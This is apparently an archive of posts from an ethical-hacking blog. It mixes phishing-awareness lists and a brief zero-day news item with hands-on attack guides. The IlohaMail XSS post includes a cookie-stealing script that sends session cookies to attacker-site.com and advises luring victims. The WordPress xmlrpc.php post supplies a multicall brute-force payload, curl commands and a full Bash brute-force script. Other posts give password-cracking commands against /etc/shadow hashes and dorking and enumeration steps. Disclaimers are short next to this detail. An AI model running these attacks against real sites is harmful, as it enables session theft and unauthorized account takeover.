Archives October 2024

In this video I will show you how hackers use the airdump-ng command to capture the WPA2 handshake. The handshake file what the hackers need to crack your password

Remember, my hacking lectures should not be used to hack others’ network but to be aware how others can easily hack your network.

Phishing is a method used by hackers to deceive individuals into providing sensitive information, such as usernames, passwords, or financial details. Here’s a list of common phishing techniques and ways to avoid them:

Common Phishing Techniques

1. Email Phishing:
   • Description: Fraudulent emails that appear to be from legitimate organizations (banks, tech companies) requesting personal information.
   • Avoidance:
     • Verify the sender’s email address.
     • Look for spelling and grammatical errors.
     • Never click on links or download attachments from unknown senders.
2. Spear Phishing:
   • Description: Targeted phishing aimed at specific individuals or organizations, often using personal information to appear legitimate.
   • Avoidance:
     • Be cautious about sharing personal information online.
     • Verify any requests for sensitive information through official channels.
3. Whaling:
   • Description: A type of spear phishing targeting high-profile individuals (CEOs, executives) within an organization.
   • Avoidance:
     • Educate executives about phishing tactics.
     • Implement strict verification processes for financial transactions.
4. Smishing:
   • Description: Phishing via SMS text messages, often containing links to malicious sites or requesting personal information.
   • Avoidance:
     • Don’t click on links in unsolicited messages.
     • Verify the sender before responding.
5. Vishing:
   • Description: Voice phishing, where attackers use phone calls to trick individuals into providing sensitive information.
   • Avoidance:
     • Don’t share personal information over the phone unless you’re sure of the caller’s identity.
     • Hang up and call back using official contact numbers.
6. Clone Phishing:
   • Description: An attacker creates a nearly identical copy of a legitimate email that has previously been sent, altering it to include a malicious link or attachment.
   • Avoidance:
     • Check for discrepancies in the email content, especially if you receive a follow-up message.
     • Use email security tools to detect cloned messages.
7. Website Spoofing:
   • Description: Attackers create fake websites that closely mimic legitimate ones to collect login credentials or personal information.
   • Avoidance:
     • Always check the URL for legitimacy (look for HTTPS and correct domain names).
     • Use bookmarks to access important sites instead of clicking on links.
8. Malware-based Phishing:
   • Description: Attackers use malware to infect a device and capture sensitive information without the victim’s knowledge.
   • Avoidance:
     • Use updated antivirus software.
     • Avoid downloading software or files from unknown sources.

General Prevention Strategies

• Education and Awareness: Regularly train employees and individuals on recognizing phishing attempts and safe online practices.
• Multi-Factor Authentication (MFA): Implement MFA to add an extra layer of security even if credentials are compromised.
• Email Filters: Use spam filters and email security solutions to detect and block phishing attempts.
• Incident Response Plan: Have a plan in place for responding to suspected phishing attempts, including reporting procedures.

By staying informed and vigilant, individuals and organizations can significantly reduce the risk of falling victim to phishing attacks.

To exploit a Cross-Site Scripting (XSS) vulnerability in IlohaMail 0.8.10, here are the general steps you would follow, assuming it’s a reflected or stored XSS vulnerability. While IlohaMail has specific nuances, the general process applies to many XSS attacks. The exact payload and entry points depend on the vulnerable application logic, but here’s a typical approach:

1. Identify the Entry Point

• Examine the application to locate forms, URL parameters, or any field where user input is processed and displayed back to the user or others (such as a message form, search box, or email body).
• For reflected XSS, find parameters in the URL or HTTP request that reflect data directly into the webpage without proper sanitization.
• For stored XSS, look for inputs where data is stored (like composing an email, sending messages, or saving settings) and later displayed without proper sanitization.

2. Craft the Malicious Payload

• Design a payload to inject into the vulnerable field that executes arbitrary JavaScript when the input is reflected back into the web page. A typical payload could be:

<script>alert('XSS Vulnerability');</script>

• If the application filters or partially sanitizes input, you may need to obfuscate or encode the payload using techniques like HTML encoding, escaping, or breaking the filter mechanism.

3. Inject the Payload

• Enter your payload into the vulnerable input point. If it’s a reflected XSS, you might inject it into a URL parameter. For example:

http://example.com/iloha/search.php?q=<script>alert('XSS');</script>

• For stored XSS, insert the payload into a persistent field (like sending an email with a malicious payload in the body or subject).

4. Trigger the Execution

• In reflected XSS, the script will execute immediately upon visiting the manipulated URL. If the application reflects the payload unsanitized, the JavaScript will run in the victim’s browser.
• In stored XSS, the script will execute whenever the data is retrieved from storage and rendered by the browser (e.g., viewing an email that contains the XSS payload).

5. Analyze the Impact

• Once the script executes, depending on the payload, it can:
  • Steal session cookies (document.cookie)
  • Perform actions on behalf of the user (e.g., sending emails, changing settings)
  • Redirect the user to malicious sites or load external scripts
  • Conduct phishing attacks by presenting fake login forms.

Example of a Malicious Payload

If you want to steal the user’s session cookies:

<script>
   var img = new Image();
   img.src = "http://attacker-site.com/log?cookie=" + document.cookie;
</script>

6. Deliver the Exploit

• For reflected XSS, send the manipulated URL to a victim or trick them into clicking it (e.g., through phishing or social engineering).
• For stored XSS, the victim will trigger the script simply by viewing the compromised data (e.g., when reading an email).

7. Escalate the Attack

Depending on the privileges of the victim user (admin, regular user, etc.), you can escalate the attack to compromise the entire system. For example:

• Hijack sessions.
• Change user settings.
• Perform actions like sending spam or altering configurations.

8. Mitigation

• After exploiting the vulnerability, report the issue to the appropriate parties (security team or application owner) for remediation. In this case, IlohaMail should escape or sanitize user input correctly, using methods like HTML encoding or input validation.

John the Ripper is a powerful open-source password cracking tool primarily used for testing password strength and recovering passwords by brute-forcing them. It is widely used in cybersecurity for ethical hacking, penetration testing, and in auditing password security. Here’s a breakdown of what it is and how it’s commonly used:

1. What is John the Ripper?

John the Ripper (JtR) is designed to detect weak passwords and is often used by security professionals to identify vulnerabilities in password policies. It can be used to crack various types of password hashes, including:

• UNIX/Linux passwords
• Windows NTLM hashes
• SHA-256 or SHA-512 encrypted passwords
• Passwords for ZIP, PDF, and RAR files

The tool can run on multiple operating systems, including Unix-based systems, Windows, and macOS.

2. How is John the Ripper Used?

John the Ripper uses several methods to crack passwords:

• Dictionary Attacks: The most basic method, where John the Ripper compares password hashes with a predefined list of likely passwords (a dictionary or wordlist).
• Brute Force Attacks: In this approach, the tool tries all possible combinations of characters until it finds the correct password. This method is time-consuming but effective if no time constraints are present.
• Hybrid Attacks: A combination of dictionary and brute-force attacks. John the Ripper might start with a dictionary, but modify words (e.g., adding numbers to the end or replacing letters with symbols) to find more complex passwords.
• Rainbow Table Attacks: Precomputed hash tables are used to speed up the cracking process.

3. Common Uses of John the Ripper

• Penetration Testing: Security professionals use John the Ripper during pen tests to identify weak passwords that attackers could exploit.
• Password Auditing: Companies use it to test the strength of employee passwords by running password audits, helping enforce stronger security policies.
• Forensics: Investigators use it to recover passwords to encrypted files or systems that may contain crucial evidence.
• Educational Purposes: It’s commonly used in cybersecurity training labs to teach ethical hacking students about password cracking techniques.

4. How to Use John the Ripper

Here’s a basic example of using John the Ripper:

1. First, collect password hashes. On a Linux machine, for example, you could extract these from the /etc/shadow file.
2. Run John the Ripper against the hash file:

john --wordlist=/path/to/wordlist.txt /path/to/hashfile.txt

This will run a dictionary attack against the hashes using the specified wordlist.

View the cracked passwords:

john --show /path/to/hashfile.txt

The tool is continually being developed, and new features are often added, such as support for newer hash algorithms.

This short video on Youtube can give you additional information on how it is being used:

In recent cybersecurity news, both Mozilla Firefox and the Tor Browser have been targeted by a zero-day exploit, posing significant risks to users worldwide. This exploit, discovered by security researchers, allows malicious actors to execute arbitrary code remotely, potentially compromising user data and system integrity.

Understanding Zero-Day Exploits

Zero-day exploits are vulnerabilities that are unknown to the software vendor or security community, making them particularly dangerous. Attackers exploit these vulnerabilities before developers can patch them, giving them a window of opportunity to target users.

Impact on Firefox and Tor Users

Mozilla Firefox, a widely used open-source web browser, and Tor Browser, renowned for its privacy features and use in anonymity networks, are both affected. Users of these browsers are advised to exercise caution:

1. Risk of Remote Code Execution: The exploit allows attackers to run malicious code on a victim’s system remotely. This could lead to data theft, installation of malware, or complete system compromise.
2. Targeted Attacks: While specific details of attacks leveraging this exploit are not fully disclosed, users should be vigilant against phishing attempts, suspicious downloads, or unexpected browser behavior.

Immediate Actions for Users

For individuals and organizations using Firefox or Tor Browser, immediate steps should be taken to mitigate risks:

1. Update Software: Developers are working on patches to fix the vulnerability. Users must update their browsers as soon as patches are released. Regularly check for updates manually if automatic updates are not enabled.
2. Disable JavaScript: Consider temporarily disabling JavaScript in your browser settings as a precautionary measure. While this may affect some functionalities, it can reduce the risk of exploitation until patches are applied.
3. Monitor Official Sources: Follow official Mozilla and Tor Project communications for updates and security advisories. These sources will provide guidance on when patches are available and any additional precautions to take.

Long-Term Security Measures

To enhance overall cybersecurity posture and resilience against zero-day exploits:

1. Implement Endpoint Protection: Utilize reputable antivirus and endpoint protection solutions that can detect and block suspicious activities, including those associated with zero-day exploits.
2. User Education: Educate users on safe browsing practices, recognizing phishing attempts, and avoiding suspicious links or downloads. Awareness is key to mitigating risks posed by such vulnerabilities.

Conclusion

The discovery of a zero-day exploit targeting Firefox and Tor Browser underscores the constant threat posed by vulnerabilities in widely used software. Prompt action by users, including updating software and adopting precautionary measures, is crucial in mitigating risks and maintaining cybersecurity hygiene. By staying informed and proactive, individuals and organizations can minimize the impact of such security threats and safeguard their digital environments effectively.

As developments unfold, continued vigilance and collaboration within the cybersecurity community will be essential to address and mitigate the impact of this zero-day exploit on Firefox and Tor users worldwide.

In this video I am going to discuss the need for network engineers to change the wifi adapter mode. I am also going to show how to change the mode from Managed to Monitor.

Note: Remember that my lectures are for you to be aware of how your system can be vulnerable from the hackers. As an ethical hacker, I am here to spread awareness to non-technical person how to avoid being hacked.

The xmlrpc.php file in WordPress is designed to handle remote procedures, such as pingbacks, trackbacks, and remote access via the WordPress mobile app or other external clients. However, this feature is often targeted by attackers due to its potential for exploitation, including brute-force attacks, DDoS attacks, and information disclosure vulnerabilities.

This guide outlines the process of exploiting the wordpress_xmlrpc_login vulnerability, typically used for brute-force password guessing via the system.multicall method in the XML-RPC API.

Step 1: Identify the Target and the Vulnerability

1. Target Identification: First, find a WordPress site that has the xmlrpc.php file exposed. You can check for its presence by sending a simple request.Run the following curl command to verify if xmlrpc.php is available:

curl -I http://example.com/xmlrpc.php

If the file exists, you will receive an HTTP 200 OK response.

Example output:

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 12:00:00 GMT
Server: Apache
X-Powered-By: PHP/7.4.23
Content-Type: text/html; charset=UTF-8

If the file is not found, you will get a 404 Not Found response.

Step 2: Understand the xmlrpc.php Functionality

The xmlrpc.php file can handle multiple remote procedure calls (RPCs) in a single request. Attackers often abuse this functionality via the system.multicall method, which allows them to send multiple authentication attempts in a single HTTP request. This is faster and more efficient for brute-force attacks compared to traditional single-login brute-force attempts.

---

Step 3: Prepare the WordPress Brute-Force Exploit via XML-RPC

In this step, you’ll exploit the system.multicall function to brute-force WordPress credentials.

• Target: WordPress login via xmlrpc.php
• Attack Type: Brute-force login attack using multiple username/password combinations in a single request

Example of an XML-RPC Brute-Force Request:

You need to craft a request that uses the system.multicall method to send multiple authentication attempts in a single request.

Here’s an example request body for brute-forcing the login:

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value>
              <struct>
                <member>
                  <name>methodName</name>
                  <value><string>wp.getUsersBlogs</string></value>
                </member>
                <member>
                  <name>params</name>
                  <value>
                    <array>
                      <data>
                        <value>
                          <array>
                            <data>
                              <value><string>admin</string></value>
                              <value><string>password1</string></value>
                            </data>
                          </array>
                        </value>
                      </data>
                    </array>
                  </value>
                </member>
              </struct>
            </value>
            <value>
              <struct>
                <member>
                  <name>methodName</name>
                  <value><string>wp.getUsersBlogs</string></value>
                </member>
                <member>
                  <name>params</name>
                  <value>
                    <array>
                      <data>
                        <value>
                          <array>
                            <data>
                              <value><string>admin</string></value>
                              <value><string>password2</string></value>
                            </data>
                          </array>
                        </value>
                      </data>
                    </array>
                  </value>
                </member>
              </struct>
            </value>
            <!-- You can add more username/password attempts here -->
          </data>
        </array>
      </value>
    </param>
  </params>
</methodCall>

In the above payload, we attempt two login requests using the wp.getUsersBlogs method, where we try the username admin with two passwords: password1 and password2.

Step 4: Send the Brute-Force Request via curl

Now, use curl to send the XML-RPC request containing multiple authentication attempts:

curl -X POST http://example.com/xmlrpc.php \
     -H "Content-Type: text/xml" \
     --data @bruteforce.xml

In this command:

• bruteforce.xml is the file containing the brute-force XML payload created in Step 3.
• Replace http://example.com with the target WordPress site’s URL.

Step 5: Analyze the Response

Once the request is sent, analyze the response to determine if any login attempts were successful. If one of the authentication attempts is valid, the server will respond with a valid session or user information.

Example success response:

<methodResponse>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value>
              <struct>
                <member>
                  <name>isAdmin</name>
                  <value><boolean>1</boolean></value>
                </member>
                <!-- Other user details -->
              </struct>
            </value>
          </data>
        </array>
      </value>
    </param>
  </params>
</methodResponse>

If none of the login attempts succeeded, the server may return an error response like this:

<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>403</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string>Incorrect username or password.</string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

Step 6: Automate the Brute-Force Attack

You can automate this process using tools like wpscan or Hydra, but here’s a simple automation using Bash scripting and curl for continuous brute-force attempts:

#!/bin/bash

# Set target and credentials file
TARGET="http://example.com/xmlrpc.php"
USER="admin"
WORDLIST="/path/to/passwords.txt"

# Loop through the passwords
while IFS= read -r PASSWORD; do
  # Create the XML payload dynamically
  PAYLOAD=$(cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params>
    <param>
      <value>
        <array>
          <data>
            <value>
              <struct>
                <member>
                  <name>methodName</name>
                  <value><string>wp.getUsersBlogs</string></value>
                </member>
                <member>
                  <name>params</name>
                  <value>
                    <array>
                      <data>
                        <value>
                          <array>
                            <data>
                              <value><string>$USER</string></value>
                              <value><string>$PASSWORD</string></value>
                            </data>
                          </array>
                        </value>
                      </data>
                    </array>
                  </value>
                </member>
              </struct>
            </value>
          </data>
        </array>
      </value>
    </param>
  </params>
</methodCall>
EOF
  )

  # Send the request and capture the response
  RESPONSE=$(curl -s -X POST $TARGET -H "Content-Type: text/xml" --data "$PAYLOAD")
  
  # Check if the response contains success
  if [[ $RESPONSE == *"isAdmin"* ]]; then
    echo "[+] Password found: $PASSWORD"
    exit 0
  else
    echo "[-] Failed: $PASSWORD"
  fi
done < "$WORDLIST"

This script will try each password from the passwords.txt wordlist until it finds the correct one.

Step 7: Mitigating the Attack

To prevent this kind of exploitation, site administrators can implement the following protections:

1. Disable xmlrpc.php: If not required, you can completely disable the xmlrpc.php file.
2. Rate Limiting and Login Lockout: Implement login rate-limiting and lockout mechanisms to prevent brute-force attempts.
3. Two-Factor Authentication (2FA): Add 2FA for additional security.
4. Use Strong Passwords: Ensure all user accounts use strong passwords that are difficult to brute-force.
5. Security Plugins: Use security plugins like Wordfence or Sucuri to monitor and protect against brute-force and XML-RPC attacks.

Accessing a hidden website page, such as a WordPress login page, should only be done legally, for example, if you are conducting security testing on a site you own or have permission to assess. Engaging in unauthorized attempts to access hidden or private pages can be illegal and unethical. With that in mind, here are some common steps used to locate a hidden WordPress login page (with permission):

1. Try Default URLs

By default, WordPress login pages are found at:

• https://example.com/wp-admin/
• https://example.com/wp-login.php

Website owners sometimes change these default URLs to obscure the login page for security purposes. However, trying the default URLs is a starting point.

2. Check Source Code and HTML Comments

• Inspect the HTML source code of the site’s pages for clues about the login page location. This could include direct links or code that references hidden login locations.
• Sometimes, administrators may leave comments in the source code that can give clues.

3. Look for Login Widgets or Forms

Some WordPress sites might have login widgets or forms on the homepage or other public pages. Inspecting these forms may reveal the action URL that points to the login page.

4. Search Using Google Dorking

Google Dorking can be used to find hidden pages indexed by search engines. A few examples:

• site:example.com inurl:login
• site:example.com inurl:wp-admin
• site:example.com intitle:"login"

These advanced search queries (dorks) might reveal login pages that are otherwise hard to find.

5. Use a Website Mapping Tool

Tools like Nmap, DirBuster, or Gobuster can scan a website for hidden directories and files. These tools look for commonly used WordPress login paths by brute-forcing directories.

6. Look for Security Plugins

WordPress websites often use security plugins that might rename the login page URL. Look for security-related headers, plugins, or tell-tale signs in the page’s code that could indicate the login page has been renamed or hidden by plugins like WPS Hide Login or iThemes Security.

7. Use WPScan (for security testing)

WPScan is a popular tool for testing WordPress security. It can enumerate WordPress URLs, plugins, and themes, which might reveal the login page.

wpscan --url https://example.com --enumerate u

8. Robots.txt File

Sometimes, the website’s robots.txt file contains paths that are excluded from search engines. It could include information about hidden pages that can be accessed manually.

9. Check Backups or Old URLs

Sometimes, older versions of the site or backup directories can still have accessible login pages. Tools like the Wayback Machine or scanning directories like /old/ or /backup/ can reveal older login pages.

10. Social Engineering (with permission)

Legitimate social engineering techniques (e.g., reaching out to customer support or reviewing public documentation about the website) can provide clues to the location of a hidden login page.

---

Ethical Considerations

Always remember that any actions you take on websites must be fully legal and authorized. If you are conducting a penetration test or security audit, ensure you have explicit permission from the owner.